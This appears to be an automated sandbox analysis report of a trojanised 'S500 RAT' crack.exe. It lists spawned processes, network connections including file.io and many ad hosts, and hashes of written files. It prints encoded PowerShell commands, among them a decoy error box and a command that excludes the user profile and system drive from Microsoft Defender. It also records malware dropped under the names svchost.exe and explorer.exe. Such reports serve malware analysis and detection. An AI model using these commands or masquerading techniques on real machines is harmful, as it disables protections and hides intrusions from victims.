C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5796 /prefetch:8
C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe
"C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGkAZAB4ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACEAIABMAGkAYwBlAG4AcwBlACAAaABhAHMAIABlAHgAcABpAHIAZQBkAC4AIABDAG8AbgB0AGEAYwB0ACAAdQBzACAAdgBpAGEAIAB0AGUAbABlAGcAcgBhAG0AIABnAHIAbwB1AHAAIAB0AG8AIABwAHUAcgBjAGgAYQBzAGUAIAAvACAAZwBlAHQAIABmAHIAZQBlACAAdAByAGkAYQBsACAAdgBlAHIAcwBpAG8AbgAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBwAG0AZAAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAZQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAegBlACMAPgA="
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Roaming\explorer.exe
"C:\Users\Admin\AppData\Roaming\explorer.exe"
C:\Users\Admin\AppData\Roaming\explorer.exe
"C:\Users\Admin\AppData\Roaming\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2440 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | file.io | udp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| NL | 18.239.94.43:443 | www.file.io | tcp |
| US | 8.8.8.8:53 | 218.110.86.104.in-addr.arpa | udp |
| US | 151.101.3.42:443 | hb.vntsm.com | tcp |
| US | 151.101.3.42:443 | hb.vntsm.com | tcp |
| US | 104.22.46.142:443 | hb.vntsm.io | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| BE | 142.251.173.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 155.173.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| GB | 172.217.16.226:443 | securepubads.g.doubleclick.net | tcp |
| BE | 142.251.173.155:443 | stats.g.doubleclick.net | udp |
| GB | 172.217.16.226:443 | securepubads.g.doubleclick.net | udp |
| GB | 172.217.169.3:443 | www.google.co.uk | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| GB | 172.217.169.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | cdn.exelator.com | udp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| NL | 18.65.39.103:443 | cdn.exelator.com | tcp |
| NL | 18.239.83.89:443 | cmp.quantcast.com | tcp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| NL | 18.65.39.103:443 | cdn.exelator.com | tcp |
| NL | 18.239.83.89:443 | cmp.quantcast.com | tcp |
| NL | 18.238.243.129:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| US | 172.67.36.110:443 | cdn.hadronid.net | tcp |
| GB | 104.78.175.230:443 | secure.cdn.fastclick.net | tcp |
| GB | 104.78.175.230:443 | secure.cdn.fastclick.net | tcp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| US | 8.8.8.8:53 | 103.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.83.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.243.238.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.52.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.36.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.175.78.104.in-addr.arpa | udp |
| US | 104.22.4.69:443 | a.ad.gt | tcp |
| GB | 104.86.111.153:80 | apps.identrust.com | tcp |
| NL | 18.239.36.42:443 | cmp.inmobi.com | tcp |
| NL | 63.215.202.146:443 | proc.ad.cpe.dotomi.com | tcp |
| US | 172.67.23.234:443 | a.ad.gt | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 18.197.41.136:443 | api.cmp.inmobi.com | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | elb.the-ozone-project.com | udp |
| NL | 18.239.88.34:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | prg.smartadserver.com | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| NL | 145.40.97.67:443 | prebid.a-mo.net | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| DE | 37.252.172.123:443 | ib.adnxs.com | tcp |
| US | 69.166.1.8:443 | apex.go.sonobi.com | tcp |
| FR | 185.86.139.85:443 | prg.smartadserver.com | tcp |
| FR | 185.86.139.85:443 | prg.smartadserver.com | tcp |
| US | 172.64.144.78:443 | elb.the-ozone-project.com | tcp |
| DE | 18.198.238.120:443 | btlr.sharethrough.com | tcp |
| DE | 18.198.238.120:443 | btlr.sharethrough.com | tcp |
| DE | 18.198.238.120:443 | btlr.sharethrough.com | tcp |
| DE | 18.198.238.120:443 | btlr.sharethrough.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| IE | 52.18.58.124:443 | track.venatusmedia.com | tcp |
| IE | 67.220.226.238:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| DE | 162.19.138.117:443 | id5-sync.com | tcp |
| NL | 213.19.162.80:443 | pixel.rubiconproject.com | tcp |
| US | 104.22.4.69:443 | pixels.ad.gt | tcp |
| US | 172.67.23.234:443 | pixels.ad.gt | tcp |
| US | 172.67.23.234:443 | pixels.ad.gt | tcp |
| GB | 142.250.178.2:443 | cm.g.doubleclick.net | tcp |
| GB | 142.250.178.2:443 | cm.g.doubleclick.net | udp |
| US | 172.67.23.234:443 | pixels.ad.gt | tcp |
| US | 104.22.4.69:443 | pixels.ad.gt | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| DE | 141.95.98.65:443 | id5-sync.com | tcp |
| US | 34.98.64.218:443 | u.openx.net | tcp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.238.198.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.58.18.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.226.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.162.19.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.98.95.141.in-addr.arpa | udp |
| IE | 52.30.187.129:443 | p.cpx.to | tcp |
| DE | 91.228.74.166:443 | pixel.quantserve.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| US | 104.18.23.145:443 | cadmus.script.ac | tcp |
| US | 104.26.8.169:443 | script.4dex.io | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| GB | 142.250.187.193:443 | 76a1b382011ec77ba8bbd4c16d10b327.safeframe.googlesyndication.com | tcp |
| US | 104.22.4.69:443 | pixels.ad.gt | tcp |
| US | 44.205.54.254:443 | onsite-tag-logs.apps.nielsen.com | tcp |
| GB | 2.23.161.247:443 | tg1.aniview.com | tcp |
| US | 104.26.8.169:443 | script.4dex.io | tcp |
| US | 34.95.69.49:443 | i.clean.gg | tcp |
| NL | 18.239.50.115:443 | rules.quantcount.com | tcp |
| IE | 108.128.16.222:443 | s.cpx.to | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| US | 34.95.69.49:443 | i.clean.gg | udp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| IE | 52.48.120.118:443 | ad.360yield.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | udp |
| GB | 216.58.212.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.212.226:443 | googleads.g.doubleclick.net | tcp |
| FR | 185.93.2.248:443 | cdn1.vntsm.com | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| GB | 104.86.110.33:443 | player.aniview.com | tcp |
| US | 96.46.186.186:443 | track4.aniview.com | tcp |
| NL | 213.19.162.90:443 | pixel.rubiconproject.com | tcp |
| GB | 104.86.111.34:443 | feed.avplayer.com | tcp |
| GB | 185.64.190.89:443 | st.pubmatic.com | tcp |
| GB | 2.23.160.192:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 115.50.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.16.128.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.120.48.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.2.93.185.in-addr.arpa | udp |
| GB | 216.58.212.226:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 104.86.110.33:443 | content1.avplayer.com | tcp |
| GB | 104.86.110.33:443 | content1.avplayer.com | tcp |
| GB | 2.23.161.247:443 | tg1.aniview.com | tcp |
| US | 34.120.111.33:443 | cdn.edkt.io | udp |
| US | 173.0.146.6:443 | go1.aniview.com | tcp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| US | 151.101.1.108:443 | acdn.adnxs.com | tcp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 193.0.160.131:443 | p.rfihub.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 216.200.232.249:443 | sync.mathtag.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| US | 54.225.145.9:443 | sync.srv.stackadapt.com | tcp |
| US | 54.225.145.9:443 | sync.srv.stackadapt.com | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| IE | 52.48.73.249:443 | match.prod.bidr.io | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| FR | 185.255.84.153:443 | visitor.omnitagjs.com | tcp |
| NL | 147.75.84.158:443 | sync.a-mo.net | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| NL | 154.57.158.25:443 | ads.stickyadstv.com | tcp |
| NL | 89.149.192.245:443 | ssbsync.smartadserver.com | tcp |
| US | 69.166.1.67:443 | sync.go.sonobi.com | tcp |
| US | 8.8.8.8:53 | 108.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.245.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.133.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.7.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.73.48.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.84.75.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.145.225.54.in-addr.arpa | udp |
| US | 69.166.1.67:443 | sync.go.sonobi.com | tcp |
| NL | 89.149.192.245:443 | ssbsync.smartadserver.com | tcp |
| NL | 154.57.158.25:443 | ads.stickyadstv.com | tcp |
| DE | 3.121.240.222:443 | match.sharethrough.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| GB | 104.86.110.33:443 | content1.avplayer.com | udp |
| NL | 154.57.158.25:443 | ads.stickyadstv.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 34.98.64.218:443 | u.openx.net | udp |
| GB | 104.86.110.33:443 | content1.avplayer.com | tcp |
| GB | 104.86.110.33:443 | content1.avplayer.com | tcp |
| IE | 54.76.134.176:443 | ap.lijit.com | tcp |
| IE | 54.76.134.176:443 | ap.lijit.com | tcp |
| US | 96.46.186.176:443 | s2s.aniview.com | tcp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| GB | 23.215.239.190:443 | secure-assets.rubiconproject.com | tcp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| US | 104.19.159.19:443 | assets.a-mo.net | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| DE | 51.38.120.206:443 | onetag-sys.com | tcp |
| US | 52.205.107.134:443 | ssp.disqus.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| DE | 52.57.233.5:443 | optimized-by.rubiconproject.com | tcp |
| GB | 216.58.204.74:443 | imasdk.googleapis.com | tcp |
| GB | 2.19.169.222:443 | eus.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | 182.186.46.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.107.205.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.169.19.2.in-addr.arpa | udp |
| US | 96.46.186.15:443 | track1.avplayer.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| GB | 216.58.204.74:443 | imasdk.googleapis.com | udp |
| GB | 216.58.201.102:443 | s0.2mdn.net | tcp |
| GB | 142.250.187.226:443 | pubads.g.doubleclick.net | tcp |
| GB | 142.250.187.226:443 | pubads.g.doubleclick.net | tcp |
| GB | 142.250.187.226:443 | pubads.g.doubleclick.net | tcp |
| GB | 142.250.187.226:443 | pubads.g.doubleclick.net | tcp |
| US | 142.250.101.120:443 | csi.gstatic.com | tcp |
| US | 142.250.101.120:443 | csi.gstatic.com | tcp |
| US | 142.250.101.120:443 | csi.gstatic.com | tcp |
| GB | 142.250.187.226:443 | pubads.g.doubleclick.net | udp |
| US | 142.250.101.120:443 | csi.gstatic.com | tcp |
| NL | 18.65.39.39:443 | public.servenobid.com | tcp |
| DE | 51.38.120.206:443 | onetag-sys.com | udp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| NL | 18.239.50.8:443 | api-2-0.spot.im | tcp |
| NL | 35.214.244.54:443 | csync.loopme.me | tcp |
| US | 70.42.32.63:443 | b1sync.zemanta.com | tcp |
| US | 70.42.32.63:443 | b1sync.zemanta.com | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| IE | 52.51.67.139:443 | jadserve.postrelease.com | tcp |
| US | 18.214.68.92:443 | cs-server-s2s.yellowblue.io | tcp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| US | 192.132.33.67:443 | bttrack.com | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| IE | 52.215.200.207:443 | a.audrte.com | tcp |
| FR | 164.132.25.184:443 | rtb-csync.smartadserver.com | tcp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| US | 8.8.8.8:53 | 92.68.214.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.33.132.192.in-addr.arpa | udp |
| FR | 185.86.139.85:443 | prg.smartadserver.com | tcp |
| US | 69.166.1.8:443 | apex.go.sonobi.com | tcp |
| US | 142.250.101.120:443 | csi.gstatic.com | udp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| NL | 213.19.162.90:443 | pixel-eu.rubiconproject.com | tcp |
| DE | 3.122.34.216:443 | rtb.mfadsrvr.com | tcp |
| FR | 178.32.210.230:443 | ssbsync-global.smartadserver.com | tcp |
| FR | 178.32.210.230:443 | ssbsync-global.smartadserver.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 69.166.1.67:443 | sync.go.sonobi.com | tcp |
| NL | 18.239.18.40:443 | cs-rtb.minutemedia-prebid.com | tcp |
| GB | 2.23.160.20:443 | hbx.media.net | tcp |
| IE | 34.254.79.166:443 | ads.servenobid.com | tcp |
| US | 104.18.42.227:443 | cdn.dxkulture.com | tcp |
| IE | 54.77.212.111:443 | ce.lijit.com | tcp |
| US | 52.46.130.91:443 | s.amazon-adsystem.com | tcp |
| US | 172.64.151.101:443 | ssum.casalemedia.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| US | 52.46.130.91:443 | s.amazon-adsystem.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 69.166.1.67:443 | sync.go.sonobi.com | tcp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| DE | 3.122.34.216:443 | rtb.mfadsrvr.com | tcp |
| DE | 3.122.34.216:443 | rtb.mfadsrvr.com | tcp |
| DE | 3.122.34.216:443 | rtb.mfadsrvr.com | tcp |
| US | 8.8.8.8:53 | 111.212.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.130.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bid.g.doubleclick.net | udp |
| IE | 52.48.195.236:443 | g2.gumgum.com | tcp |
| IE | 52.48.195.236:443 | g2.gumgum.com | tcp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| US | 169.197.150.7:443 | match.deepintent.com | tcp |
| US | 54.157.68.100:443 | sync.ipredictive.com | tcp |
| IE | 52.51.201.51:443 | pr-bh.ybp.yahoo.com | tcp |
| JP | 124.146.153.165:443 | tg.socdm.com | tcp |
| DK | 37.157.4.29:443 | c1.adform.net | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| JP | 124.146.153.165:443 | tg.socdm.com | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | udp |
| NL | 79.127.227.46:443 | id.rtb.mx | tcp |
| NL | 79.127.227.46:443 | id.rtb.mx | tcp |
| NL | 79.127.227.46:443 | id.rtb.mx | tcp |
| NL | 79.127.227.46:443 | id.rtb.mx | tcp |
| GB | 185.64.190.84:443 | ow.pubmatic.com | tcp |
| GB | 185.64.190.84:443 | ow.pubmatic.com | tcp |
| NL | 213.19.162.71:443 | prebid-server.rubiconproject.com | tcp |
| NL | 213.19.162.71:443 | prebid-server.rubiconproject.com | tcp |
| US | 45.55.126.71:443 | ads.dxkulture.com | tcp |
| US | 45.55.126.71:443 | ads.dxkulture.com | tcp |
| NL | 193.3.178.3:443 | ads.us.e-planning.net | tcp |
| US | 45.55.126.71:443 | ads.dxkulture.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| DE | 79.127.216.47:443 | id.rtb.mx | tcp |
| DE | 79.127.216.47:443 | id.rtb.mx | tcp |
| DE | 79.127.216.47:443 | id.rtb.mx | tcp |
| DE | 79.127.216.47:443 | id.rtb.mx | tcp |
| DK | 37.157.4.29:443 | c1.adform.net | tcp |
| US | 45.55.126.71:443 | ads.dxkulture.com | tcp |
| US | 45.55.126.71:443 | ads.dxkulture.com | tcp |
| FR | 164.132.25.184:443 | rtb-csync.smartadserver.com | tcp |
| NL | 178.250.1.7:443 | ssp-sync.criteo.com | tcp |
| FR | 178.32.210.230:443 | ssbsync-global.smartadserver.com | tcp |
| FR | 178.32.210.230:443 | ssbsync-global.smartadserver.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0e10a8550dceecf34b33a98b85d5fa0b |
| SHA1 | 357ed761cbff74e7f3f75cd15074b4f7f3bcdce0 |
| SHA256 | 5694744f7e6c49068383af6569df880eed386f56062933708c8716f4221cac61 |
| SHA512 | fe6815e41c7643ddb7755cc542d478814f47acea5339df0b5265d9969d02c59ece6fc61150c6c75de3f4f59b052bc2a4f58a14caa3675daeb67955b4dc416d3a |
\??\pipe\LOCAL\crashpad_4072_DJRBNLFHLQIOUTRN
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3b1e59e67b947d63336fe9c8a1a5cebc |
| SHA1 | 5dc7146555c05d8eb1c9680b1b5c98537dd19b91 |
| SHA256 | 7fccd8c81f41a2684315ad9c86ef0861ecf1f2bf5d13050f760f52aef9b4a263 |
| SHA512 | 2d9b8f574f7f669c109f7e0d9714b84798e07966341a0200baac01ed5939b611c7ff75bf1978fe06e37e813df277b092ba68051fae9ba997fd529962e2e5d7b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e9c578b1c1b5a43ccf3d24ec802695df |
| SHA1 | 57a276b765d8aaff6b3c09d28e515816c1621f70 |
| SHA256 | 193fbb98264f8ba47f3549d8e11f097f37995b09b926b482738e4222b92ac12a |
| SHA512 | 8f4f82aebfddb9dfbe236a45af1443d36aefb9ba33ffd7a9e61c8227456e47c72945599468d44bb8869a15ca6e54b80d039b6471dd6f943fd2d432b6481430a6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7f90ebe7923b35cb1258687796069a2e |
| SHA1 | c427b64c414d9227651a467a93594ea33a04116d |
| SHA256 | e8555038303a25d063dee3ca242536e89c1712eb36aae105c14b9d86dc26df51 |
| SHA512 | 997bb2352755a080353a5bc33834be12b1d88f479b3bfd05259209fa460a901b6adb97f0169de9a8124c3862968783894c9c4828c9474ab8d8c675a324e2cd5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e72b5b9f93cd456131764f6c821aa8bd |
| SHA1 | a014d2ee7717496299d5038f6eaca51b830c73e7 |
| SHA256 | 8e041652d69e49c2c759def7d1d9051aba9d693e732ed0727b89924c9de484bd |
| SHA512 | bd948ffcccd6f0f110b56d75282552bdf554e3c7f197452cd598c999e7047acfdebee58f4779fc1d71a15fad2727e8c341d8793848181998cfa9016ecbf79149 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024
| MD5 | 4322f0449af173fb3994d2bef7ecb2e4 |
| SHA1 | b6ee5c6f76b8eee448f6b4b2b56fa1ec39653934 |
| SHA256 | 0502e6e2f3fc54a30dea0eb07eb19a395c7ea6fc273321a49a4cc977a59b7cc9 |
| SHA512 | d8bae6131a5a8a1fcabb2d7efebc6cdbba27955fb77484a5d87dbce7a237c0cd5e19b74b4dad28312929ad732d3b80cf3d7f15f059c88438d0bc6ff9535ceeef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_prebid.a-mo.net_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57cc29.TMP
| MD5 | 403b37e5a015e522e21907a98ffac8e0 |
| SHA1 | cb135cac9dda15f697a8f5397d2994b236e2d884 |
| SHA256 | b65ff529070ebabb94b93fc21074e182e609165858089923017debb81da408e9 |
